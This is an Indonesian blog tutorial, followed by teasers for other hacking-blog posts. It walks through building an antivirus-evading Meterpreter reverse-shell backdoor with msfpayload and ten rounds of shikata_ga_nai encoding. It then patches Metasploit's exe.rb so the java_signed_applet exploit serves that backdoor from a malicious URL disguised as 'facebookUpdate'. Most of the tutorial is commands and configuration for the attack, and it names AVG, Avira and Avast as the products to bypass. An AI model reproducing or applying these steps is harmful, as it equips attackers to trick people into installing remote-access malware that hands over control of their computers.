memasang backdooor di windows


Sebenarnya simple sekali purpose dan tutorial ini, membuat malicious URL seperti yang dilakukan SET secara manual dan menempatkan backdoor sesuai dengan keinginan kita. Karena secara default backdoor yagn di buat oleh malicious java server seperti rhinno dan java_signed_applet biasanya merupakan backdoor biasa yang mudah sekali di block antivirus ...

Ide yang baik sekali untuk memodifikasi file exe.rb dimana backdoor yang di packing dengan ekstensi java "jar" dapat diarahkan sesuai dengan backdoor yang telah kita kombinasikan dengan "msfencode"

Tutorial ini sana buat dengan Backtrack .. sekali lagi anda tinggal menyesuaikan dengan path metasploit dan direktori anda .. karena pada dasarnya semua OS yang terinstall metasploit msf adalah sama ...

Pertama-tama kita buat backdoor untuk bypass av seperti avg,avira,avast dll
ketikkan perintah sebagai berikut
root@dvildance:/# msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.4 PORT=4444R | msfencode -e x86/shikata_ga_nai -c 10  -t exe  -o /root/dvil.exe
yup dont forget ya agar membuat outputnya ke /root coz itu yang kita pasang di script exe.rb nanti
sekarang waktunya untuk mengdit exe.rb
buka terminal lalu ketikkan perintah selanjutnya
root@dvildance:~# cd /opt/metasploit/msf3/lib/msf/util
root@dvildance:/opt/metasploit/msf3/lib/msf/util# ls
exe.rb  svn.rb
root@dvildance:/opt/metasploit/msf3/lib/msf/util# vim exe.rb

lalu edit di bagian jar
def self.to_jar(exe, opts={})
                spawn = opts[:spawn] || 2
                exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
                zip = Rex::Zip::Jar.new
                paths = [
                        [ "metasploit", "Payload.class" ],
                ]
sehingga  menjadi
def self.to_jar(exe, opts={})
               exe = File.read("/root/dvil.exe")
               spawn = opts[:spawn] || 2
               exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
               zip = Rex::Zip::Jar.new
               paths = [
                       [ "metasploit", "Payload.class" ],
               ]
      

lihat yang tulisan merah itu adalah letak backdoor yangtelah kita buat tadi dengan shikata ga nai
 Kalau semua persiapan sudah selesai .. kita buat exploit + listenernya .. memang sudah sepaket.
buka metasploit dengan msfconsole lalu ketikkan exploitnya

msf > use exploit/multi/browser/java_signed_applet (pilih exploit ini)
msf  exploit(java_signed_applet) >set payload windows/meterpreter/reverse_https (set payload .. kudu harus sama dengan backdoor awal
msf  exploit(java_signed_applet) > set URIPATH / (untuk path malicious url .. exp. http://192.168.1.9/ )
msf  exploit(java_signed_applet) > set SRVPORT 80 (port standart malicious server .. di sarankan port 80 biar langsung kebuka)
msf  exploit(java_signed_applet) > set  SRVHOST 192.168.1.9 ( lokal ip server malicious  kita )
msf  exploit(java_signed_applet) > set LHOST 192.168.1.9 ( ip lokal untuk listener)
msf  exploit(java_signed_applet) > set APPLETNAME facebookUpdate (Nama paket jar yang akan di injection ke target)
msf  exploit(java_signed_applet) > set CERTCN facebookUpdate (sertifikat java)
msf  exploit(java_signed_applet) >exploit (mulai exploit )

Comments

Post a Comment

Popular posts from this blog

Free Download 16 Template Hacker Blog

Image
Helloo sobat Blogger semua, di kesempatan kali ini saya akan share beberapa template koleksian milik saya. template2 ini saya dapatkan dari beberapa sumber. dan saya tegaskan kalau beberapa dari template ini bukan saya yg ciptakan, saya hanya sekedar share aja agar kalian lebih mudah mencari template yg cocok buat blog kalian. ok langsung aja di sedot...   Template Transparan [1] Sumber DOWNLOAD Template Transparan  [2] Sumber DOWNLOAD Template Transparan [3] Sumber DOWNLOAD Template Transparan [4] Sumber DOWNLOAD Template Transparan [5] Sumber DOWNLOAD Template  Naruto-vs-Sasuke Sumber DOWNLOAD Template  BlackHat Sumber DOWNLOAD Template Blackhat 2012 Sumber DOWNLOAD TemplateHC Sumber DOWNLOAD   Template  Dark Murder Sumber DOWNLOAD Irvan Blue Template Sumber DOWNLOAD Template  RVGreen Sumber DOWNLOAD
Read more

perbedaan program aplikasi dengan sistem oprasi

Image
Macam-Macam Perangkat Lunak Secara umum, software digunakan untuk mempermudah pengorganisasian kinerja Hardware . Dengan adanya software akan mengurangi interaksi manusia pada Hardware yang bermacam-macam. Kita dapat mengelompokkan software berdasarkan fungsi atau dukungannya terhadap hardware. Dukungan pada hardware dapat digambarkan dalam diagram dibawah ini: Dari gambar terlihat dibawah hardware langsung terdapat software sistem operasi. Software sistem Operasi ini yang melakukan hubungan dengan hardware secara langsung. Hardware yang beroperasi tanpa sistem operasi akan mempunya operasi yang terbatas dan tidak dapat di gunakan untuk menjalasnkan software aplikasi. Berdasarkan fungsinya, software dibagi menjadi tujuh, yaitu Sistem Operasi Program Aplikasi Bahasa Pemrograman Program Bantu Program Paket Program Permainan Program Multimedia 1. SISTEM OPERASI Sistem operasimerupakan program utama yang langsung berinteraksi dengan bahasa yang di kenal oleh mesin
Read more

11 distro untuk kebutuhan pentester ato hacking

Image
Top Ten Penetrasi Pengujian Distribusi Linux 18 Balasan BackTrack adalah distribusi linux yang paling populer pentesting di pasar hari ini, tetapi ada orang lain! Setiap Keamanan Informasi profesional perlu untuk bekerja dengan distro pentesting dan pelatihan yang paling mengharuskan Anda bekerja bersama alat yang digunakan dalam sebuah distro. Update: Karena beberapa komentar besar di bawah ini kita mengedit posting ini jadi sekarang menjadi 11 12 Distro Linux Terbaik Penetrasi itu. OK, tidak ada distribusi pentesting berikut berada di daftar top 100 selama di Tonton Distro tapi kami tidak peduli - kita berbicara tentang alat pengujian penetrasi - atau secara khusus penciptaan distro yang memiliki semua alat yang diperlukan sumber terbuka yang membantu etis hacker dan penguji penetrasi melakukan pekerjaan mereka. Seperti segala sesuatu yang lain ketika datang ke pilihan, setiap distro pentesting memiliki pro, kontra dan khusus. Beberapa di
Read more